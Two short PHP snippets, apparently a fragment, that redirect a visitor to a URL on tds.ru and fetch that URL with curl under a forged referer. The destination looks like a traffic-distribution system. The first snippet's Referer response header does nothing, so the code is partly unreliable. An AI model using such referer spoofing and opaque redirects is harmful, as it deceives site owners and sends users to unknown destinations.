<?php header('Referer: 111.html'); header('Location: http://tds.ru/go.php?sid=1'); ?>
<?php $ch = curl_init(); curl_setopt($ch, CURLOPT_REFERER, '111.html' ); curl_setopt($ch, CURLOPT_URL, "http://tds.ru/go.php?sid=1"); curl_exec($ch); curl_close($ch); ?>